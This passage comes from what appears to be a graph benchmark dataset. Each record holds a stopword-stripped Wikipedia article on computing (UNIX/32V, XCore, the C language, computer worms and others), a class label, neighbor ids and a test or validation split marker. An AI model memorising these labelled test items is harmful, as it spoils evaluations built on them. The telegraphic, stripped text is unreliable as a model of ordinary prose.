policy supported california digital library digital curation services cdl merritt digital archive",
    "neighbors": [
      7523,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2032,
    "label": 3,
    "text": "Survivor_(1987_video_game):survivor 1987 video game survivor action game released 1987 spanish software house topo soft later re-released uk u.s. gold published several 8-bit formats including amstrad cpc msx zx spectrum player takes control alien bears striking resemblance race aliens alien series films aboard huge spacecraft filled many extraterrestrial creatures player must perpetuate alien race finding ten pods ship introducing incubators ship split 142 areas divided four zones zones joined doors air-vents player crawl zones also consist different levels connected lifts pods found large rooms different corridors vents make much spacecraft closely resemble sort room found 1980s platform games creatures ship dangerous player spit paralysing acid player limited amount energy sapped hostile creatures ship defence systems energy replenished managing place pod incubator eating one technicians found wandering around ship",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2033,
    "label": 4,
    "text": "Computer_Underground_Digest:computer underground digest computer underground digest cud weekly online newsletter early internet cultural social legal issues published gordon meyer jim thomas march 1990 march 2000 meyer thomas criminal justice professors northern illinois university intended newsletter cover topical social legal issues generated rise telecommunications internet existed primarily email mailing list usenet though archives later provided website newsletter came prominence published legal commentary updates concerning hacker crackdowns federal indictments leonard rose craig neidorf phrack cud published commentary membership subjects including legal social implications growing internet later web book reviews topical publications many off-topic postings readership overtaken growth online forums web ceased publication march 2000",
    "neighbors": [
      4956,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2034,
    "label": 4,
    "text": "Internet_Security_Research_Group:internet security research group internet security research group isrg californian public-benefit corporation focuses internet security let encrypt—its first major initiative—aims make transport layer security tls certificates available free automated fashion josh aas serves group executive director board chair board also contains individuals akamai cisco university michigan mozilla aclu coreos electronic frontier foundation",
    "neighbors": [
      3941,
      517,
      5834,
      8170,
      6834,
      2003
    ],
    "mask": "Test"
  },
  {
    "node_id": 2035,
    "label": 2,
    "text": "UNIX/32V:unix/32v unix/32v early version unix operating system bell laboratories released june 1979 32v direct port seventh edition unix dec vax architecture 32v unix primarily run dec pdp-11 computers bell labs group developed operating system dissatisfied dec members refused dec offer buy vax machine announced 1977 already begun unix port interdata 8/32 instead dec approached different bell labs group holmdel new jersey accepted offer started work become 32v performed tom london john f. reiser porting unix made possible due work done sixth seventh editions operating system decouple native pdp-11 environment 32v team first ported c compiler johnson pcc adapting assembler loader written interdata 8/32 version unix vax ported april 15 1978 version unix finding process bourne shell ... required far largest conversion effort supposedly portable program simple reason portable unix/32v released without paging virtual memory retaining swapping architecture seventh edition virtual memory system added berkeley bill joy özalp babaoğlu order support franz lisp released unix licensees third berkeley software distribution 3bsd 1979 thanks popularity two systems successors 4bsd unix system v unix/32v antecedent nearly modern unix systems",
    "neighbors": [
      515,
      6787,
      6412,
      9231,
      6675,
      11539,
      5397,
      2584,
      1304,
      3487,
      3488,
      8991,
      1316,
      7460,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      9027,
      10436,
      3526,
      8262,
      8395,
      5840,
      9298,
      2132,
      11604,
      6369,
      8545,
      9444,
      9452,
      623,
      7666,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2036,
    "label": 3,
    "text": "Linux_kernel_mailing_list:linux kernel mailing list linux kernel mailing list lkml main electronic mailing list linux kernel development majority announcements discussions debates flame wars kernel take place many mailing lists exist discuss different subsystems ports linux kernel lkml principal communication channel among linux kernel developers high-volume list usually receiving 1,000 messages day kernel code patches linux utilizes workflow governed lkml bazaar kernel development takes place book linux kernel development robert love notes lkml functions central place linux developers around world share patches argue implementation details discuss issues official releases linux kernel indicated email lkml new features discussed code posted list action taken also official place reporting bugs linux kernel case one find maintainer bug reported author michelle delio suggests lkml tux official linux mascot suggested refined although accuracy reporting stories disputed many companies associated linux kernel make announcements proposals lkml example novell intel vmware ibm etc list subscribers include linux kernel maintainers well known figures linux circles jeff v. merkey eric s. raymond etc. 2000 study found 14,535 people least 30 different countries sent least one email lkml 1995 2000 participate discussion linux development authors books linux kernel development model open source knowledge creation motivation software developers open source projects recovering device drivers made use lkml research studies surveys lwn.net website frequently cover discussion lkml newsletter kernel traffic covered activities linux-kernel mailing list november 2005 many internet websites include archives mailing list lore.kernel.org/lkml lkml.org mail-archive.com marc.info linus torvalds known angrily disagreeing developers lkml calling really unpleasant person later explained 'd like nice person curse less encourage people grow rather telling idiots 'm sorryi tried attitude torvalds considers necessary making point clear drawn opposition intel programmer sage sharp systemd developer lennart poettering among others 2018 torvalds took break kernel development work improving behavior instituted code conduct",
    "neighbors": [
      4616,
      6153,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      2109,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      8298,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      6281,
      7821,
      4238,
      10382,
      2194,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      246,
      2294,
      8439,
      2809,
      3323,
      11003,
      7938,
      4360,
      1291,
      4367,
      1813,
      2838,
      792,
      1820,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      11130,
      8573,
      1406,
      3969,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      8679,
      1513,
      3055,
      5105,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 2037,
    "label": 3,
    "text": "Compaq_Presario_2700:compaq presario 2700 presario 2700 series series laptop models released compaq computer corporation specific models series include presario 2700us 2701us 2710us presario 2700us released september 2001 featured intel pentium iii 256mb ram default upgradeable 1024mb 2700us also featured maximum screen resolution 1600 1200 pixels released january 2002 presario 2710us shipped 1.13ghz pentium 3 processor ati mobility radeon m6 graphics card 8mb video memory",
    "neighbors": [
      6765
    ],
    "mask": "Test"
  },
  {
    "node_id": 2038,
    "label": 9,
    "text": "Java_Platform_Module_System:java platform module system java platform module system specifies distribution format collections java code associated resources also specifies repository storing collections modules identifies discovered loaded checked integrity includes features namespaces aim fixing shortcomings existing jar format especially jar hell lead issues classpath class loading problems java module system initially developed java community process jsr 277 scheduled released java 7 jsr 277 later put hold project jigsaw created modularize jdk jsr superseded jsr 376 java platform module system project jigsaw originally intended java 7 2011 deferred java 8 2014 part plan b deferred java 9 release 2017.. java 9 including java module system released september 21 2017 java module system implemented java 9 include following jeps jsr java specification request additionally several jdk 9 features added ease transition module system modules new way grouping code data contrary jar files modules explicitly declare modules depend packages export example following module declaration declares module com.foo.bar depends another com.foo.baz module exports following packages com.foo.bar.alpha com.foo.bar.beta contrary jar file format module describe dependencies module declaration placed file named module-info.java root module ’ source-file hierarchy jdk able check compile-time runtime jdk modularized java 9 java module system intend support functionalities osgi platform currently supports example life-cycle model services registry however java module system support functions supported osgi modularity compile-time built-in support native libraries couple articles exploring java module system osgi could interoperate published 2016 found infoq also osgi alliance blog",
    "neighbors": [
      4960,
      8108,
      5677,
      10540
    ],
    "mask": "Test"
  },
  {
    "node_id": 2039,
    "label": 3,
    "text": "XCore_Architecture:xcore architecture xcore architecture 32-bit risc microprocessor architecture designed xmos architecture designed used multi-core processors embedded systems xcore executes eight concurrent threads thread register set architecture directly supports inter-thread inter-core communication various forms thread scheduling two versions xcore architecture exist xs1 architecture xs2 architecture processors xs1 architecture include xcore xs1-g4 xcore xs1-l1 processors xs2 architecture include xcore-200 architecture encodes instructions compactly using 16 bits frequently used instructions three operands 32 bits less frequently used instructions 6 operands almost instructions execute single cycle architecture event-driven order decouple timings program needs make execution speed program program normally perform computations wait event e.g message time external i/o event continuing two versions xcore architecture xs1 xs2 xs2 extending xs1 architecture xs1 architecture first xcore architecture defined 2007 implemented xcore xs1-g4 xcore xs1-l1 xcore xs1-su xcore xs1-ana former four-core processing node latter three single dual core processing nodes xs2 architecture defined 2015 implemented xcore-voice processors xcore-200 series processors latter marketed xl2 series general purpose xu2 series usb xe2 series rgmii versions embedded flash xs2 extends xs1 architecture limited form dual issue execution processor core comprises two lanes resource lane execute io operations general arithmetic memory lane execute memory operations branches general arithmetic short resource arithmetic instructions executed resource lane short memory branch arithmetic operations executed memory lane long instructions span lanes dual issue mode pairs instructions aligned 32-bit boundary instructions added aid high bandwidth processing dual-word load/store dual-word zip unzip bit byte strings dual word arithmetic saturation shift architecture comprises central execution unit operates set 25 registers surrounded number resources perform operations interact environment thread set hardware registers enabling threads execute concurrently instruction set comprises less standard sequential programming model instructions implement multi-threading multi-core i/o operations instructions access 12 general-purpose registers r0–r11 general completely interchangeable except instructions use r11 implicitly also 4 base registers usable instructions registers 16 24 accessible specialized instructions except first two r16 pc program counter r17 sr status register dedicated exception interrupt handling status register contains various mode bits processor standard alu result flags like carry zero negative overflow add subtract carry instructions exist specify five operand registers two inputs input carry one output output carry instructions 16-bit 32-bit encoding instructions use zero six operands common arithmetic operations add sub mult three-operand instructions based set 12 general purpose registers last four forms share opcode range number operands determined bits 5 10 last three forms use bit 4 additional opcode bit last form uses bits 1 0 well second form instructions loads stores use four bits encode register number allowing access r12–r15 instructions conditional branches allow register numbers 11 instead allowing third form share opcode range constants always unsigned many instructions come add/subtract pairs e.g jump forward backward form instruction determined four most-significant bits encoding three-operand register opcodes quite unusual since 12 registers power 2 encoding used fits zero three operands number operands 11 bits thus 5-bit opcode assigned four times three-operand instruction two-operand etc cases low 2 bits register number placed 2-bit field reducing problem encoding high bits range 0 2 three-operand form places low register numbers low 6 instruction bits high 2 bits register number combined base-3 number 0 26 using 9× +3× b c stored remaining 5 bits two-operand form uses unused 5 combinations 27–31 5-bit field operand used 2-bit field low bits reassigned one bit used additional opcode bit used additional combination register specifier doubling number available combinations 10 allowing 9 combinations 3× b c represented done manner similar bi-quinary coded decimal combination modulo 5 stored 5-bit field 3× b c mod 5 27 1-bit quotient ⌊ 3× b c /5⌋ stored instruction bit 5 marked asterisk table one-operand instructions use tenth combination value 6 bits set place register number 4 available bits operand c specified high bits stored b field finally one-operand encoding register number 12 b field contains binary 11 also used encode zero-operand instructions two low-order bits c field available additional opcode bits bringing total 8 instructions use register c field value 0–11 small immediate constant use select one 12 convenient bit-shift constants 0–8 16 24 32 less frequently used instructions encoded 32 bits 32-bit instructions allow 16- 20-bit immediate operands far branches six register operands example long multiply four source two destination operands additional opcode space rarely used instructions one 10-bit immediate opcode pfix opcode 111100 used add additional 10 bits 6- 10-bit immediate following instruction one three-operand opcode eopr opcode 11111 reserved additional operands prefix 3 operands used along following instruction word produce additional 32-bit instructions six operands also used rarely used three- two-operand instructions cases eopr specifies three two operands following instruction word zero-operand instruction two-operand case extra opcode bit leading eopr used thread access 12 general purpose registers r0 ... r11 addition 4 special purpose registers sp lr link register stores return address cp constant pool points part memory stores constants dp data pool points global variables addition 16 another 9 registers store pc kernel pc exception type exception data saved copies case exception interrupt instruction set load-store instruction set almost instructions execute single cycle instruction need data memory example arithmetic operations instruction prefetch word instructions instructions encoded 16-bits instructions loads stores typical number 20 loads stores 80 instructions prefetch mechanism stay ahead instructions stream acts like small instruction cache behaviour predicted compile time making timing behaviour predictable functional behaviour instructions access memory use base register sp dp cp pc general purpose register single 16-bit instruction thread access larger sections memory accessed means extended instructions extend ranges 64 kbytes scheme designed order densely encode common cases found many programming patterns access small stack frames small set globals constants structures arrays access bit fields odd length facilitated means sign zero extend instructions common arithmetic instructions provided including divide remainder instructions single cycle comparison instructions compute truth value 0 1 register avoiding use flags many instructions immediate version allows single operand value 0 11 inclusive encoding many common cases 1 case bit operations shift immediate value encodes common cases extra instructions provided reversing bits bytes count leading zeros digital signal processing long integer arithmetic branch instructions include conditional unconditional relative branches branch using address register provided relative branch adds scaled register operand program counter provided support jump tables branches instructions distance encoded single word procedure calling instructions include relative calls calls via constant pool indexed calls via dedicated register calls via register calls within single program module encoded single instruction inter-module calling requires two instructions callee save link-register leaf-function single instruction extends stack saves link register dual issue mode available xs2 enables one short load store branch instruction paired one short resource instruction short arithmetic instructions paired instruction enables inner-loops example transfer data memory io halved length issuing load instruction together add instruction change counter together branch instruction xs1 instruction set designed support multi threading multi-core computations extent supports channel communication support distributed memory computations barriers locks support shared memory computations thread initiates execution one newly allocated threads setting initial register values communication threads performed using channels provide full-duplex data transfer channel-ends enables amongst others implementation csp based languages languages based pi calculus instruction set agnostic channel connected whether inside core outside core channels carry messages constructed data control tokens two channel ends control tokens used encode communication protocols channel ends buffer able hold sufficient tokens allow least one word buffered output instruction executed channel full take data thread executed instruction paused restarted enough room channel instruction successfully complete likewise input instruction executed enough data available thread paused restarted enough data becomes available thread single instruction synchronise group threads using barrier synchronisation alternatively thread synchronise using lock providing mutual exclusion order communicate data using barriers locks threads either write data registers another thread access memory another thread provided threads execute core shared memory used compiler programmer must ensure race conditions xs2 architecture 'priority mode enables threads run high priority low priority threads guaranteed progress high priority threads guaranteed thread cycle ready execute xs1 architecture event-driven instruction dispatch external events addition traditional interrupts program chooses use events underlying processor expect event wait specific place handled synchronously desired i/o handled asynchronously using interrupts events interrupts used resource implementation supports common resources supported ports external input output timers allow timing reference clock channels allow communication synchronization threads within core threads different cores locks allow controlled access shared memory synchronizers implement barrier synchronizations threads",
    "neighbors": [
      8450,
      1298,
      9371,
      8861,
      10013,
      3493,
      5029,
      6311,
      682,
      10796,
      4269,
      9391,
      2224,
      4144,
      10675,
      1462,
      9911,
      7234,
      6084,
      3014,
      3142,
      9932,
      6607,
      2517,
      10985,
      9964,
      8048,
      8944,
      10612,
      757,
      1399,
      249,
      3451,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2040,
    "label": 7,
    "text": "Meta-scheduling:meta-scheduling meta-scheduling super scheduling computer software technique optimizing computational workloads combining organization multiple distributed resource managers single aggregated view allowing batch jobs directed best location execution meta-scheduling technique solution scheduling set depended independent faults different scenarios mapping modeling event-tree used dynamic static scheduling method work use static scheduling adaptive tt mpsoc systems meta-scheduling described technique optimize computational workload combining organizing multiple distributed resources integrated view words extended data-flow model quasi-static scheduling dynamic behaviour changes scenario-based multi-mode approaches essential techniques embedded-systems e.g. design space exploration mpsocs reconfigurable systems optimization techniques generation schedule graphs supporting sbmes approach developed implemented sbmes promise better performance reducing dynamic scheduling overhead recovering faults following partial list noteworthy open source commercial meta-schedulers currently available",
    "neighbors": [
      105,
      3753,
      8030,
      1806
    ],
    "mask": "Test"
  },
  {
    "node_id": 2041,
    "label": 4,
    "text": "Computer_worm:computer worm computer worm standalone malware computer program replicates order spread computers often uses computer network spread relying security failures target computer access worms almost always cause least harm network even consuming bandwidth whereas viruses almost always corrupt modify files targeted computer many worms designed spread attempt change systems pass however morris worm mydoom showed even payload-free worms cause major disruption increasing network traffic unintended effects actual term worm first used john brunner 1975 novel shockwave rider novel nichlas haflinger designs sets data-gathering worm act revenge powerful men run national electronic information web induces mass conformity biggest-ever worm loose net automatically sabotages attempt monitor ... never worm tough head long tail november 2 1988 robert tappan morris cornell university computer science graduate student unleashed became known morris worm disrupting large number computers internet guessed time one tenth connected morris appeal process u.s. court appeals estimated cost removing virus installation 200 53,000 work prompted formation cert coordination center phage mailing list morris became first person tried convicted 1986 computer fraud abuse act code designed spread worm typically referred payload typical malicious payloads might delete files host system e.g. explorezip worm encrypt files ransomware attack exfiltrate data confidential documents passwords probably common payload worms install backdoor allows computer remotely controlled worm author zombie networks machines often referred botnets commonly used range malicious purposes including sending spam performing dos attacks worms spread exploiting vulnerabilities operating systems vendors security problems supply regular security updates see patch tuesday installed machine majority worms unable spread vulnerability disclosed security patch released vendor zero-day attack possible users need wary opening unexpected email run attached files programs visit web sites linked emails however iloveyou worm increased growth efficiency phishing attacks remains possible trick end-user running malicious code anti-virus anti-spyware software helpful must kept up-to-date new pattern files least every days use firewall also recommended april–june 2008 issue ieee transactions dependable secure computing computer scientists described new potentially effective way combat internet worms researchers discovered contain worms scanned internet randomly looking vulnerable hosts infect found key use software monitor number scans machines network send machine started send many scans sign infected allowed administrators take line check malware addition machine learning techniques used detect new worms analyzing behavior suspected computer users minimize threat posed worms keeping computers operating system software date avoiding opening unrecognized unexpected emails running firewall antivirus software mitigation techniques include beginning first research worms xerox parc attempts create useful worms worms allowed testing john shoch jon hupp ethernet principles network xerox alto computers nachi family worms tried download install patches microsoft website fix vulnerabilities host system—by exploiting vulnerabilities practice although may made systems secure generated considerable network traffic rebooted machine course patching work without consent computer owner user regardless payload writers intentions security experts regard worms malware several worms like xss worms written research worms spread example effects changes social activity user behavior one study proposed seems first computer worm operates second layer osi model data link layer utilizes topology information content-addressable memory cam tables spanning tree information stored switches propagate probe vulnerable nodes enterprise network covered",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      8,
      8200,
      3595,
      9227,
      9233,
      9242,
      9246,
      9761,
      2084,
      4648,
      4649,
      9256,
      9771,
      46,
      6707,
      5173,
      10297,
      3643,
      7739,
      9791,
      1088,
      4165,
      10309,
      9800,
      9803,
      81,
      4689,
      8789,
      1622,
      9824,
      2147,
      3683,
      4198,
      107,
      10348,
      8302,
      2675,
      6261,
      6262,
      3704,
      7289,
      10872,
      10875,
      5245,
      5246,
      6786,
      9346,
      5764,
      9351,
      138,
      3724,
      5261,
      6797,
      9356,
      4240,
      10898,
      4245,
      10392,
      1690,
      3739,
      4765,
      6303,
      5281,
      6305,
      2213,
      7337,
      7851,
      7855,
      10417,
      3262,
      8387,
      4295,
      7368,
      10952,
      4298,
      3789,
      5325,
      7886,
      9423,
      10448,
      2262,
      3286,
      6360,
      10457,
      3290,
      4314,
      1245,
      225,
      2275,
      6373,
      10477,
      4344,
      3320,
      10492,
      4349,
      5373,
      1279,
      4863,
      5886,
      3843,
      4356,
      3852,
      9488,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      790,
      793,
      3867,
      4892,
      5404,
      8998,
      300,
      3887,
      2864,
      6454,
      311,
      11577,
      827,
      7996,
      3390,
      11583,
      3394,
      3395,
      4435,
      7515,
      4956,
      4957,
      11103,
      8032,
      3941,
      11621,
      3944,
      2409,
      877,
      4462,
      8045,
      5490,
      4467,
      9588,
      7031,
      6520,
      9591,
      9087,
      3969,
      899,
      7044,
      11140,
      9607,
      1417,
      2953,
      5002,
      7564,
      10637,
      9102,
      10132,
      10141,
      9630,
      2975,
      10657,
      8612,
      939,
      6059,
      9646,
      1970,
      4023,
      10167,
      9145,
      7098,
      6588,
      3520,
      9664,
      1474,
      7106,
      9154,
      3525,
      8133,
      9160,
      2508,
      10190,
      467,
      9171,
      2005,
      5589,
      5591,
      3032,
      9688,
      10710,
      988,
      9187,
      7659,
      11244,
      10747,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2042,
    "label": 3,
    "text": "Processor_Control_Region:processor control region processor control region pcr windows kernel mode data structure contains information current processor accessed via fs segment register x86 versions gs segment register x64 versions respectively windows pcr known kpcr contains information current processor pcr contains substructure called processor control block kprcb contains information cpu step pointer thread object current thread",
    "neighbors": [
      1776,
      6797,
      1791
    ],
    "mask": "Test"
  },
  {
    "node_id": 2043,
    "label": 9,
    "text": "SystemBuilder/SB+:systembuilder/sb+ systembuilder 4gl development runtime environment originally written pick family computer databases/environments part rocket u2 software suite systembuilder environment comprises sb+ server often running rocket u2 database sbclient runs microsoft windows desktop application product run either developer runtime mode development environment enables rapid prototyping development deployment applications includes rudimentary gui application environment system builder started garden shed south africa first cousins neill derek miller 1982 popularity pick database system combined lack good development framework led develop tool build standard menus screens system builder software company incorporated isle man cousins moved sydney australia early 1980s product successful expanding international markets versions began re-develop product ground become sb+ released early 1990 traditionally time pick systems accessed using dumb green-screen terminals rise pc new paradigm presented around end 1991 product enhanced addition specialised terminal emulation client called termulator able tightly integrate server pc allow facilities like downloads direct server lotus 1-2-3 new kid block microsoft excel shortly client program renamed sbclient ability render server 'green-screens client gui screens added clever set driver interpreters bought unidata corporation 1996 following unidata merger vmark software form ardent software 1998 systembuilder product set came ownership informix 2000 following purchase ardent software datastage product subsequently 2001 informix bought ibm u2 systembuilder products eventually found way become part ibm data management portfolio development systembuilder redback products continued sydney 2005 merged u2 development team located denver united states recently 1 october 2009 rocket software announced purchase entire u2 suite includes systembuilder ibm system builder/sb+ server environment based around set key tools utilities leverage provide powerful comprehensive development environment built mainly tools sb+ includes application menuing system screen generator 3gl programming language expression language gui components report writer tool recent iteration system builder sb/xa v6.5.2 released oct 2017 sb/xa includes many major enhancements including new gui system based xaml",
    "neighbors": [
      6850,
      4042,
      6797,
      8340,
      4410
    ],
    "mask": "Test"
  },
  {
    "node_id": 2044,
    "label": 2,
    "text": "Dnotify:dnotify dnotify file system event monitor linux kernel one subfeatures fcntl call introduced 2.4 kernel series obsoleted inotify retained compatibility reasons function essentially extension filesystems notice changes filesystem report changes applications instead application checking changes filesystem application register notified kernel changes filesystem occur application select directories monitor types changes notified one major use desktop search utilities like beagle functionality permits reindexing changed files without scanning filesystem changes every minutes would inefficient told file changed directly kernel rather actively looking beagle utilities achieve change-to-reindexing times second small performance hits dnotify therefore enables use programs sensible manner daemons generally accepted distributors drain system performance noticeably provide userland functionality",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      11293,
      10785,
      9762,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      9872,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      2974,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186
    ],
    "mask": "Test"
  },
  {
    "node_id": 2045,
    "label": 9,
    "text": "C_(programming_language):c programming language c letter c general-purpose procedural computer programming language supporting structured programming lexical variable scope recursion static type system prevents unintended operations design c provides constructs map efficiently typical machine instructions found lasting use applications previously coded assembly language applications include operating systems well various application software computers ranging supercomputers embedded systems c originally developed bell labs dennis ritchie 1972 1973 make utilities running unix later applied re-implementing kernel unix operating system 1980s c gradually gained popularity nowadays one widely used programming languages c compilers various vendors available majority existing computer architectures operating systems c standardized ansi since 1989 see ansi c subsequently international organization standardization c imperative procedural language designed compiled using relatively straightforward compiler provide low-level access memory provide language constructs map efficiently machine instructions require minimal runtime support despite low-level capabilities language designed encourage cross-platform programming standards-compliant c program written portability mind compiled wide variety computer platforms operating systems changes source code language become available various platforms embedded microcontrollers supercomputers like procedural languages algol tradition c facilities structured programming allows lexical variable scope recursion static type system prevents unintended operations c executable code contained within subroutines also called functions though strictly sense functional programming function parameters always passed value pass-by-reference simulated c explicitly passing pointer values c program source text free-format using semicolon statement terminator curly braces grouping blocks statements c language also exhibits following characteristics c include certain features found languages object orientation garbage collection implemented emulated often use external libraries e.g. glib object system boehm garbage collector many later languages borrowed directly indirectly c including c++ c unix c shell go java javascript limbo lpc objective-c perl php python rust swift verilog systemverilog hardware description languages languages drawn many control structures basic features c. python dramatic exception also express highly similar syntax c tend combine recognizable expression statement syntax c underlying type systems data models semantics radically different origin c closely tied development unix operating system originally implemented assembly language pdp-7 dennis ritchie ken thompson incorporating several ideas colleagues eventually decided port operating system pdp-11 original pdp-11 version unix developed assembly language thompson needed programming language make utilities first tried make fortran compiler soon gave idea made new language b thompson simplified version bcpl however utilities written b b slow b could take advantage pdp-11 features byte addressability 1972 ritchie started improve b resulted creating new language c. c compiler utilities made included version 2 unix version 4 unix released nov. 1973 unix kernel extensively re-implemented c. time c language acquired powerful features codice_12 types unix one first operating system kernels implemented language assembly earlier instances include multics system written pl/i master control program mcp burroughs b5000 written algol 1961 around 1977 ritchie stephen c. johnson made changes language facilitate portability unix operating system johnson portable c compiler served basis several implementations c new platforms 1978 brian kernighan dennis ritchie published first edition c programming language book known c programmers k r served many years informal specification language version c describes commonly referred k r c second edition book covers later ansi c standard described k r introduced several language features even publication 1989 ansi standard many years k r c still considered lowest common denominator c programmers restricted maximum portability desired since many older compilers still use carefully written k r c code legal standard c well early versions c functions return types codice_30 must declared used function definition functions used without prior declaration presumed return type codice_30 example codice_30 type specifiers commented could omitted k r c required later standards since k r function declarations include information function arguments function parameter type checks performed although compilers would issue warning message local function called wrong number arguments multiple calls external function used different numbers types arguments separate tools unix lint utility developed among things could check consistency function use across multiple source files years following publication k r c several features added language supported compilers particular pcc vendors included large number extensions lack agreement standard library together language popularity fact even unix compilers precisely implemented k r specification led necessity standardization late 1970s 1980s versions c implemented wide variety mainframe computers minicomputers microcomputers including ibm pc popularity began increase significantly 1983 american national standards institute ansi formed committee x3j11 establish standard specification c. x3j11 based c standard unix implementation however non-portable portion unix c library handed ieee working group 1003 become basis 1988 posix standard 1989 c standard ratified ansi x3.159-1989 programming language c version language often referred ansi c standard c sometimes c89 1990 ansi c standard formatting changes adopted international organization standardization iso iso/iec 9899:1990 sometimes called c90 therefore terms c89 c90 refer programming language ansi like national standards bodies longer develops c standard independently defers international c standard maintained working group iso/iec jtc1/sc22/wg14 national adoption update international standard typically occurs within year iso publication one aims c standardization process produce superset k r c incorporating many subsequently introduced unofficial features standards committee also included several additional features function prototypes borrowed c++ codice_15 pointers support international character sets locales preprocessor enhancements although syntax parameter declarations augmented include style used c++ k r interface continued permitted compatibility existing source code c89 supported current c compilers c code written today based program written standard c without hardware-dependent assumptions run correctly platform conforming c implementation within resource limits without precautions programs may compile certain platform particular compiler due example use non-standard libraries gui libraries reliance compiler- platform-specific attributes exact size data types byte endianness cases code must compilable either standard-conforming k r c-based compilers codice_38 macro used split code standard k r sections prevent use k r c-based compiler features available standard c. ansi/iso standardization process c language specification remained relatively static several years 1995 normative amendment 1 1990 c standard iso/iec 9899/amd1:1995 known informally c95 published correct details add extensive support international character sets c standard revised late 1990s leading publication iso/iec 9899:1999 1999 commonly referred c99 since amended three times technical corrigenda c99 introduced several new features including inline functions several new data types including codice_39 codice_40 type represent complex numbers variable-length arrays flexible array members improved support ieee 754 floating point support variadic macros macros variable arity support one-line comments beginning codice_41 bcpl c++ many already implemented extensions several c compilers c99 part backward compatible c90 stricter ways particular declaration lacks type specifier longer codice_30 implicitly assumed standard macro codice_43 defined value codice_44 indicate c99 support available gcc solaris studio c compilers support many new features c99 c compiler microsoft visual c++ however implements c89 standard parts c99 required compatibility c++11 2007 work began another revision c standard informally called c1x official publication 2011-12-08 c standards committee adopted guidelines limit adoption new features tested existing implementations c11 standard adds numerous new features c library including type generic macros anonymous structures improved unicode support atomic operations multi-threading bounds-checked functions also makes portions existing c99 library optional improves compatibility c++ standard macro codice_43 defined codice_46 indicate c11 support available published june 2018 c18 current standard c programming language introduces new language features technical corrections clarifications defects c11 standard macro codice_43 defined codice_48 historically embedded c programming requires nonstandard extensions c language order support exotic features fixed-point arithmetic multiple distinct memory banks basic i/o operations 2008 c standards committee published technical report extending c language address issues providing common standard implementations adhere includes number features available normal c fixed-point arithmetic named address spaces basic i/o hardware addressing c formal grammar specified c standard line endings generally significant c however line boundaries significance preprocessing phase comments may appear either delimiters codice_49 codice_50 since c99 following codice_41 end line comments delimited codice_49 codice_50 nest sequences characters interpreted comment delimiters appear inside string character literals c source files contain declarations function definitions function definitions turn contain declarations statements declarations either define new types using keywords codice_12 codice_35 codice_14 assign types perhaps reserve storage new variables usually writing type followed variable name keywords codice_57 codice_30 specify built-in types sections code enclosed braces codice_59 codice_60 sometimes called curly brackets limit scope declarations act single statement control structures imperative language c uses statements specify actions common statement expression statement consisting expression evaluated followed semicolon side effect evaluation functions may called variables may assigned new values modify normal sequential execution statements c provides several control-flow statements identified reserved keywords structured programming supported codice_61 -codice_62 conditional execution codice_63-codice_4 codice_4 codice_2 iterative execution looping codice_2 statement separate initialization testing reinitialization expressions omitted codice_68 codice_69 used leave innermost enclosing loop statement skip reinitialization also non-structured codice_70 statement branches directly designated label within function codice_5 selects codice_72 executed based value integer expression expressions use variety built-in operators may contain function calls order arguments functions operands operators evaluated unspecified evaluations may even interleaved however side effects including storage variables occur next sequence point sequence points include end expression statement entry return function call sequence points also occur evaluation expressions containing certain operators codice_73 codice_10 codice_75 comma operator permits high degree object code optimization compiler requires c programmers take care obtain reliable results needed programming languages kernighan ritchie say introduction c programming language c like language blemishes operators wrong precedence parts syntax could better c standard attempt correct many blemishes impact changes already existing software basic c source character set includes following characters newline indicates end text line need correspond actual single character although convenience c treats one additional multi-byte encoded characters may used string literals entirely portable latest c standard c11 allows multi-national unicode characters embedded portably within c source text using codice_83 codice_84 encoding codice_85 denotes hexadecimal character although feature yet widely implemented basic c execution character set contains characters along representations alert backspace carriage return run-time support extended character sets increased revision c standard c89 32 reserved words also known keywords words used purposes predefined c99 reserved five words c11 reserved seven words recently reserved words begin underscore followed capital letter identifiers form previously reserved c standard use implementations since existing program source code using identifiers would affected c implementations started supporting extensions programming language standard headers define convenient synonyms underscored identifiers language previously included reserved word called codice_130 seldom implemented removed reserved word c supports rich set operators symbols used within expression specify manipulations performed evaluating expression c operators c uses operator codice_136 used 